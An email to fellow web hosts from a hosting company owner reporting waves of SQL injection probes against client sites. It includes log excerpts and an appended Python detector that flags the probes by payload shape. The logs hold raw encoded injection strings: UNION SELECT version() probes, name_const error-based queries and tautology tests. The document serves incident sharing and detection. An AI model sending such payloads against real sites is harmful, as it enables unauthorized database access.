<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
</head>
<body>
<p><font face="Calibri">Hey HT web hosts out there,</font></p>
<p><font face="Calibri">Due to recent hacking attempts against our
servers, I have installed an IP Tracker that tracks and blocks
any aggressive activity.</font></p>
<p><font face="Calibri">Starting late last week we've found a
growing number of IP numbers that appear to be attempting SQL
Injection attacks. I've pasted a few snippets from our logs,
below.</font></p>
<p><font face="Calibri">Anyone else seeing this kind of activity on
their servers? Every time I block an IP number they move to
another IP number. The list of IPs hitting us is growing, and
moving across multiple hosts.<br>
</font></p>
<p><font face="Calibri">So far, I've contacted four different server
hosts about the traffic coming from their servers. By far the
most "infected" appears to be the Unified Layer family of
hosting companies, which includes HostGator Mexico, webhostbox
Bigrock India, and a number of others. Additional sources of the
attacks are Hetzner.com from Germany; Ozkula from Turkey; and
ColoCrossing from Buffalo NY. I'm sure more will be added as the
days go on.<br>
</font></p>
<p><font face="Calibri">Stay safe.</font></p>
<p><font face="Calibri">Mik<br>
</font></p>
<pre class="moz-signature" cols="72"><font size="-2"><font face="Courier New, Courier, monospace">94.130.76.249 13:38:44 fitzgerald-realestate.com term=0 /%2f**%2fcOnVeRt(int%2c(char(33)%2bchar(126)%2bchar(33)%2b(char(65)%2bchar(66)%2bchar(67)%2bchar(49)%2bchar(52)%2bchar(53)%2bchar(90)%2bchar(81)%2bchar(54)%2bchar(50)%2bchar(68)%2bchar(87)%2bchar(81)%2bchar(65)%2bchar(70)%2bchar(80)%2bchar(79)%2bchar(73)%2bchar(89)%2bchar(67)%2bchar(70)%2bchar(68))%2bchar(33)%2bchar(126)%2bchar(33)))
94.130.76.249 13:38:45 fitzgerald-realestate.com term=0' /z'0=A
94.130.76.249 13:38:47 fitzgerald-realestate.com /z term=%2f**%2fcOnVeRt(int%2c(char(33)%2bchar(126)%2bchar(33)%2b(char(65)%2bchar(66)%2bchar(67)%2bchar(49)%2bchar(52)%2bchar(53)%2bchar(90)%2bchar(81)%2bchar(54)%2bchar(50)%2bchar(68)%2bchar(87)%2bchar(81)%2bchar(65)%2bchar(70)%2bchar(80)%2bchar(79)%2bchar(73)%2bchar(89)%2bchar(67)%2bchar(70)%2bchar(68))%2bchar(33)%2bchar(126)%2bchar(33)))
94.130.76.249 13:38:59 fitzgerald-realestate.com /z term=0%20AND%201=1
94.130.76.249 13:39:01 fitzgerald-realestate.com /z term=0999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1
94.130.76.249 13:39:03 fitzgerald-realestate.com /z term=099999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x
94.130.76.249 13:39:04 fitzgerald-realestate.com /z term=099999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x
94.130.76.249 13:39:06 fitzgerald-realestate.com /z term=0%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20and%201%3D1
94.130.76.249 13:39:07 fitzgerald-realestate.com /z term=0%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%27x%27=%27x
94.130.76.249 13:39:09 fitzgerald-realestate.com /z term=0%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%22x%22=%22x
</font></font></pre>
<p><br>
</p>
<pre class="moz-signature" cols="72"><font size="-2"><font face="Courier New, Courier, monospace">37.247.110.108 08:14:38 Greenfield-MA.gov /z term=Licensing%20AND%201=1
37.247.110.108 08:14:42 Greenfield-MA.gov /z term=Licensing999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1
37.247.110.108 08:14:44 Greenfield-MA.gov /z term=Licensing99999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x
37.247.110.108 08:14:46 Greenfield-MA.gov /z term=Licensing99999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x
</font></font></pre>
<p><font face="Calibri"></font><br>
</p>
<pre class="moz-signature" cols="72"><font face="Courier New, Courier, monospace"><font size="-1">192.3.204.226 14:58:55 Greenfield-MA.gov /z term=Licensing
192.3.204.226 14:58:56 Greenfield-MA.gov /z term=Licensing2121121121212/1
192.3.204.226 14:58:57 Greenfield-MA.gov /z term=Licensing%20AND%201=1
192.3.204.226 14:58:59 Greenfield-MA.gov /z term=Licensing999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1
192.3.204.226 14:59:00 Greenfield-MA.gov /z term=Licensing99999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x
</font> </font></pre>
<pre class="moz-signature" cols="72">--
---
Mik Muller, president
Montague WebWorks
239-R Main Street, Greenfield, MA
413-320-5336
<a class="moz-txt-link-freetext" href="http://MontagueWebWorks.com">http://MontagueWebWorks.com</a>
Powered by ROCKETFUSION</pre>
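<p>Added example, not part of the original message or of the IP Tracker it mentions: because the probes keep moving to new addresses, this sketch keys on the decoded payload shape rather than the source IP and reports which signatures arrive from more than one address. The rule names and function names are hypothetical; the sample lines are copied from the log excerpts above, plus one constructed benign request.</p>

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Hypothetical rule names; patterns cover the probe shapes in the excerpts above.
RULES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "version_probe": re.compile(r"\bversion\s*\("),
    "name_const": re.compile(r"\bname_const\s*\("),
    "convert_int": re.compile(r"\bconvert\s*\(\s*int\b"),
    "tautology": re.compile(r"\b(and|or)\s+1\s*=\s*1\b|(['\"])x\2\s*=\s*\2x"),
}

# Lines copied from the excerpts above, plus one constructed benign request (last).
SAMPLE = [
    "94.130.76.249 13:38:59 fitzgerald-realestate.com /z term=0%20AND%201=1",
    "94.130.76.249 13:39:01 fitzgerald-realestate.com /z term=0999999/1%20union"
    "%20select%20unhex(hex(version()))%20--%20and%201%3D1",
    "37.247.110.108 08:14:44 Greenfield-MA.gov /z term=Licensing99999%27%20union"
    "%20select%20unhex(hex(version()))%20--%20%27x%27=%27x",
    "192.3.204.226 14:58:55 Greenfield-MA.gov /z term=Licensing",
    "192.3.204.226 14:58:59 Greenfield-MA.gov /z term=Licensing999999/1%20union"
    "%20select%20unhex(hex(version()))%20--%20and%201%3D1",
    "203.0.113.7 09:00:00 example.org /z term=union%20street",
]

def classify(request):
    """Return the sorted tuple of rule names matching one request string."""
    text = unquote(request).lower()         # undo %xx encoding and cOnVeRt-style casing
    text = re.sub(r"/\*.*?\*/", " ", text)  # drop inline SQL comments such as /**/
    return tuple(sorted(n for n, rx in RULES.items() if rx.search(text)))

def shared_signatures(lines):
    """Map each rule set seen from more than one source IP to those IPs."""
    ips_by_sig = defaultdict(set)
    for line in lines:
        parts = line.split(None, 3)         # ip, time, host, rest of the request
        if len(parts) != 4:
            continue
        ip, _time, _host, request = parts
        sig = classify(request)
        if sig:
            ips_by_sig[sig].add(ip)
    return {s: sorted(ips) for s, ips in ips_by_sig.items() if len(ips) > 1}

if __name__ == "__main__":
    for sig, ips in shared_signatures(SAMPLE).items():
        print(", ".join(sig), "seen from", ", ".join(ips))
```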
</body>
</html>